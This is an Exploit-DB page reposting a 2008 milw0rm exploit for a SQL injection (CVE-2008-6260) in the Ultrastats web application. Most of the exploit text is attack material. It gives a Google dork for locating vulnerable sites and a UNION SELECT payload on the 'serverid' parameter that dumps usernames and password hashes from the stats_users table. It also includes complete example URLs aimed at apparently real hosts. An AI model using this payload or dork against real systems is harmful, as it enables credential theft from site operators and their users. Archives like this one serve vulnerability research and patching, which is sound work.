Ultrastats 0.2.144/0.3.11 - 'serverid' SQL Injection

EDB-ID:

7148

CVE:

2008-6260

EDB Verified:

Author:

eek

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2008-11-17

Vulnerable App:

			
				                     #########
				                   #############
				                 #################
				               ####################
				              ####`   `####`   `####
				             #####|||        |||#####
				            ######|||        |||######
				           #######||| ||##|| |||#######
				           #######||||||##||||||#######
 				           ############################
 				            ###########################
        				      ######+++++++++++######
            				          #++++++++++++#
   				               ___#++++++++++++#
      				             _|   #++++++++++++|___
       				            |        ++++++++      |
      				            |_          ++        _|
         				      |_________+________|
########################################################################################################
#                         Ultrastats exploit by  eeee eeee e   e                                       #
#                         -------------------->  8    8    8   8                                       # 
#                                                8eee 8eee 8eee8e                                      #
#                                                88   88   88   8                                      #
#                                                88ee 88ee 88   8 ---> mail: hexdez@nm.ru              #
########################################################################################################
#                                                -> Greetz to:                                         #
#             th0br0,magicwolf,_d4vid,ekaF,psychobarbie,d3hydr8,modda,#chaostreffpunkt                 #
########################################################################################################
#                                  -> Ultrastats all Versions?! Sql Injection                          #
#                                        (Version 0.3.11 & 0.2.144 tested)                             #
########################################################################################################
#                                      -> Dork: inurl:"index.php?serverid="                            #
########################################################################################################
#                                                  -> Injection:                                       #
# Querry -> index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--  #
#                                              and watch the Source  ;)                                #
#                                                                                                      #
#                                                 -> Example:                                          #
# -> v.  0.3.11:                                                                                       #
#                                                                                                      ##
# http://cod2demo.ultrastats.org/index.php?serverid=2+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--
#
# -> v. 0.2.144: 
#
# http://www.ultrastats.x2server4u.de/index.php?serverid=6+union+select+0,1,concat(username,0x3a,password),3+from+stats_users--
##

# milw0rm.com [2008-11-17]

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services